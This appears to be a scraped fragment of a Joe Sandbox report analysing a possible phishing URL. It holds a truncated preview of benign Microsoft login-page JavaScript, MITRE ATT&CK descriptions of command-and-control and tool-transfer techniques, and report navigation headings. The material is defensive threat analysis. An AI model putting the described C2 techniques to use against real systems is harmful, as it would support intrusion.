Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
Category:	downloaded
Size (bytes):	3452
Entropy (8bit):	5.117912766689607
Encrypted:	false
SSDEEP:	96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
MD5:	CB06E9A552B197D5C0EA600B431A3407
SHA1:	04E167433F2F1038C78F387F8A166BB6542C2008
SHA-256:	1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
SHA-512:	1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
Malicious:	false
Reputation:	low
URL:	https://login.live.com/Me.htm?v=3
Preview:	<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s(\w+)\s=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p\|\|s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("\|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://m3ins.azurewebsites.net/?user-agent=Mozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 59

Chrome Cache Entry: 60

Chrome Cache Entry: 61

Chrome Cache Entry: 62

Chrome Cache Entry: 63

Chrome Cache Entry: 64

Chrome Cache Entry: 65

Chrome Cache Entry: 66

Chrome Cache Entry: 67

Chrome Cache Entry: 68

Chrome Cache Entry: 69

Chrome Cache Entry: 70

Chrome Cache Entry: 71

Chrome Cache Entry: 72

Chrome Cache Entry: 73

Chrome Cache Entry: 74

Chrome Cache Entry: 75

Chrome Cache Entry: 76

Chrome Cache Entry: 77

Chrome Cache Entry: 78

Chrome Cache Entry: 79

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
https://m3ins.azurewebsites.net/?user-agent=Mozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML